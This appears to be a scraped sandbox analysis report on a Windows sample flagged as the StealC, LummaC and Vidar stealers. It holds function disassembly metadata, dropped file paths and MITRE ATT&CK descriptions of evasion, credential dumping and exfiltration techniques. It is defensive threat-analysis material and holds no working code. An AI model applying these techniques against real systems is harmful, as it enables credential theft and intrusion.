Opcode Fuzzy Hash: d566767256c45ac9024f25040ca0f9eb3eb5680452e3da8451354c959b671c0f
Instruction Fuzzy Hash: A151C274908645AFDB15CFA8D8896FDBFF4BF16708F08885ED941A7361CB709A08CB50

Function 0041A590 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCPMTD ref: 0041A637

Strings

HHA, xrefs: 0041A5A6
HHA, xrefs: 0041A627, 0041A62F, 0041A62A, 0041A632

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: _memcpy_s
String ID: HHA$HHA
API String ID: 2001391462-78794114
Opcode ID: d22e5025005132be8ae8e07c2e5cc95db775846b98abc1004e97a32bd5275221
Instruction ID: 58fc70c8d1e743df8a21e54f01107f1756ebb3a48e4e49249704d6386acab13f
Opcode Fuzzy Hash: d22e5025005132be8ae8e07c2e5cc95db775846b98abc1004e97a32bd5275221
Instruction Fuzzy Hash: D4514AB9D01209ABDF04DF94D845AEF77B5BB44304F14842AE81997341E738EAA1CB66

Function 0054051C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

___unDName.LIBVCRUNTIME ref: 00540549

Part of subcall function 005496F8: ___unDNameEx.LIBVCRUNTIME ref: 00549711

InterlockedPushEntrySList.KERNEL32(0040F01D,0040F01D,?,?,?,?,?,?,?,?,?,0040F01D,?,0058E940), ref: 005405C4

Strings

@X, xrefs: 005405A5, 005405CA

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Name___un$EntryInterlockedListPush
String ID: @X
API String ID: 723550680-3927199268
Opcode ID: 227ca6a570cde2c246336002fd2555bf695669cbe09e84dec2d86bdc94294ec0
Instruction ID: df260370169ace51d469760d7011fdbb54e4a96fff24df410436cdc31a6c4d77
Opcode Fuzzy Hash: 227ca6a570cde2c246336002fd2555bf695669cbe09e84dec2d86bdc94294ec0
Instruction Fuzzy Hash: 8221D731500205AFDB11DF68CC89DEA7FB8FF8536CB245069E5059B281E672DE46CB90

Function 005463B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 005463CE
DName::DName.LIBVCRUNTIME ref: 00546453

Strings

A, xrefs: 00546433

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::
String ID: A
API String ID: 1333004437-3554254475
Opcode ID: 2fdc20fddfea1591c3d5a697cac88cf68f1fc6810f6cfe2fbcf50ae7afa78082
Instruction ID: ad5c5cdc900119de4e1c1a943c798a011e003d9e89420341421d5f873e963e72
Opcode Fuzzy Hash: 2fdc20fddfea1591c3d5a697cac88cf68f1fc6810f6cfe2fbcf50ae7afa78082
Instruction Fuzzy Hash: 9C219D74904149AFDF04DF94D846BEC7FB1FB86308F10C859E9456B261C7709A49EB42

Function 0040E300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040E314
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E3C1

Part of subcall function 0053F2A2: _Yarn.LIBCPMT ref: 0053F2C1
Part of subcall function 0053F2A2: _Yarn.LIBCPMT ref: 0053F2E5

Strings

bad locale name, xrefs: 0040E3CB

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 09efe5c459f684f080d25be1aa42f4a05728932db351713f5b067b284370b649
Instruction ID: f7ef2f4ab1df595a199d7dad6d9cd8243b94916aedc5e8d5d18da55d8c9c26c6
Opcode Fuzzy Hash: 09efe5c459f684f080d25be1aa42f4a05728932db351713f5b067b284370b649
Instruction Fuzzy Hash: E831F8B4E04209DFDB04CF98D995BAEFBB1FF48304F248199D805AB381C775AA51CBA5

Function 004164F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCPMTD ref: 004165CB

Strings

eVA, xrefs: 0041650C, 0041651E, 00416533, 00416591, 0041659D, 004165AA
eVA, xrefs: 00416567, 00416545, 00416553, 0041655D

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: _memcpy_s
String ID: eVA$eVA
API String ID: 2001391462-2010160217
Opcode ID: 840fe47f7f40b0dd22249d9de1a3239d75facf5a1c0f6b941722fd50a3e2e93c
Instruction ID: 9ab3e6916cf0d860965d67e495f956fdb17b34ad4b651c815909af831e30d601
Opcode Fuzzy Hash: 840fe47f7f40b0dd22249d9de1a3239d75facf5a1c0f6b941722fd50a3e2e93c
Instruction Fuzzy Hash: 2531AA74A04208EFDB04CF98D094BEEB7B5BF48344F2481A9D8489B346D775AE85DF94

Function 00544B73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00544BB6
DName::operator+=.LIBCMT ref: 00544BF6

Strings

void, xrefs: 00544BD8

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::Name::operator+=
String ID: void
API String ID: 2247604192-3531332078
Opcode ID: 6ab67c0c92cd683935c3d760e861924ecaa3ee2f924fa67f1b4545954e850829
Instruction ID: 0b70565bd5bc2618c294dadaf4d02abc9ed392641c077eee4745f215ef411b4f
Opcode Fuzzy Hash: 6ab67c0c92cd683935c3d760e861924ecaa3ee2f924fa67f1b4545954e850829
Instruction Fuzzy Hash: 0F1151B584421AAACF04EFA4C85ABFEBFB8FF44318F00455AE445A7295DB749744CF90

Function 0055AC6F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0055C4F5,-00000020,00000FA0,00000000,0050BDF6,00000000,0000000C), ref: 0055ACAF

Strings

uS, xrefs: 0055AC9F
InitializeCriticalSectionEx, xrefs: 0055AC7F

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$uS
API String ID: 2593887523-3775022884
Opcode ID: 8ecc14de15b3f062c649c4283e6c1ad1845279ea43ebf8b6edd17f07ea0cef32
Instruction ID: 79bf836e81b0caea49663d7db22fc0aae6f3863b6163f39525539326c9f449f6
Opcode Fuzzy Hash: 8ecc14de15b3f062c649c4283e6c1ad1845279ea43ebf8b6edd17f07ea0cef32
Instruction Fuzzy Hash: 7CE09236580218BBCB112F51DC19D9D7F21FB54B62F008131FD1957160C7B28D60E7E1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AFBKKFBAEGDH\CAEBGH

C:\ProgramData\AFBKKFBAEGDH\JKKKJJ

C:\ProgramData\AFHDBGHJ

C:\ProgramData\AFIDGDBG

C:\ProgramData\BKFCAFCFBAEH\AFHDBG

C:\ProgramData\BKFCAFCFBAEH\BKEHDG

C:\ProgramData\BKFCAFCFBAEH\BKKJKF

C:\ProgramData\BKFCAFCFBAEH\BKKJKF-shm

Windows Analysis Report
file.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre